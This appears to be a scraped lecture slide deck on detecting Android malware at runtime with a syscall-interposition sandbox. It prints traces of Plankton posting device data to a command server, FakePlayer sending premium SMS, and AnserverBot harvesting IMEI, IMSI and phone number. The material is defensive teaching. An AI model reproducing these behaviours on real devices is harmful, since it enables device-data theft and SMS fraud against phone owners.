160 likes | 333 Views
Monitoring Malware at Runtime. From Last Lecture. Malware authors use advanced coding for avoiding detection AnserverBot is a very sophisticate piece of software AVS is lagging behind Low detection rate on new malware Large exposure window before updating DB
E N D
From Last Lecture • Malware authors use advanced coding for avoiding detection • AnserverBotis a very sophisticate piece of software • AVS is lagging behind • Low detection rate on new malware • Large exposure window before updating DB • Main issue: rely only on app signature • What we need is a tool to detect runtime behaviour
FireDroid • Our group is developing a new Android Security framework • FireDroidis capable of monitoring app execution and enforcing security policies • No need of modifying Android OS code! • Only modification is to insert a line of text in the init.rc file • FireDroidenables us to monitor system call execution of apps (and malware)
System Call Interposition • System calls are used by apps to interact with the kernel • By intercepting sensitive system calls we can enforce security policies to better protect Android • We can use FireDroid also to provide us information about the system call executed by apps
Malware Genome Project • Collection of 2GB of malware samples • We have executed some of these samples within FireDroid sandbox • In the following, we are going to see some more details • After the semester break, Daniel will provide a live demo
Plankton • Communication with a C&C server • Sends some info when the installation is complete • Together with some setting of the phone
Opening a socket [1743] syscall=socket(281) domain:PF INET6 type:SOCK STREAM protocol:IPPROTO IP ****************************** [1743] syscall=bind(282) socket: socket:[26088] sa family = AF INET6 port = 0 address = :: ****************************** [1743] syscall=connect(283) socket: socket:[26088] sa family = AF INET6 port = 80 address = 208.93.141.140 ******************************
Establishing a connection [****************************** [1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 168 data: POST /ProtocolGW/installation HTTP/1.1 Content-Length: 1426 Content-Type: application/x-www-form-urlencoded Host: www.searchwebmobile.com Connection: Keep-Alive ****************************** [1743] syscall=sendto(290) socket:socket:[26088] Connected Socket! data len: 1024 data: action=get&applicationId=325842969&developerId=752469853& deviceId=000000000000000¤tVersion=-1&permissions=android…..
FakePlayer • The main activity is to send SMS • It will get the handler for the SMS service from the Service Manager • Then sends SMS to premium number (7132) with different subscription codes
Sending SMS [*1905]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC _MGR _GET _SERVICE service name = isms data size = 80 ****************************** [*1905]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = com.android.internal.telephony.ISms target = 0x9 code = 5 (sendText) data size = 128 Destination: 7132 SMS Body: 849321
AnserverBot • Retrieves information from the Telephony services • Telephone number • International Mobile Station Equipment Identity (IMEI) • International Mobile Subscriber Identity (IMSI) • This info is quite sensitive because it specifically points at YOU!
Getting the PhoneSubInfoService [*2071]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC MGR GET SERVICE service name = iphonesubinfo ****************************** [*2071]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 5 data size = 100 data in text format: code 5: getLineNumber: Retrieves the phone number string for line 1
Getting More Info ****************************** … code 1: getDeviceId: Retrieves the unique device ID, e.g., IMEI for GSM phones. ****************************** … code 4: getIccSerialNumber: Retrieves the serial number of the ICC, if applicable. ****************************** … code 2: getDeviceSvn: Retrieves the software version number for the device, e.g., IMEI/SV for GSM phones. ****************************** … code 3: getSubscriberId: Retrieves the unique subscriber ID, e.g., IMSI for GSM phones.
AnserverBot Fetching from Baidu ****************************** [1639] syscall=connect(283) socket: socket:[57270] sa family = AF INET6 port = 80 address = 220.181.111.147 ****************************** [1639] syscall=sendto(290) socket: socket:[57270] Connected Socket! data len: 153 data: GET / HTTP/1.1 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; sdk Build/MR1)^M Host: www.baidu.com Connection: Keep-Alive Accept-Encoding: gzip
AnserverBot Fetching from Baidu [1639] syscall=recvfrom(292) socket: socket:[57270] Connected Socket! data len: 128 data: HTTP/1.1 200 OK^M Set-Cookie: BAIDUID=127C8FA29422CAB3BA61707A4969F5DB:FG=1; max-age=31536000; expires=Tue, 29-Oct-13 01:17:10 GM ****************************** [1639] syscall=recvfrom(292) :00:00 GMT; path=/; domain=.baidu.com^M P3P: CP='' OTI DSP COR IVA OUR IND COM ``^M Cache-Control: no-cache^M Content-type: text/html ******************************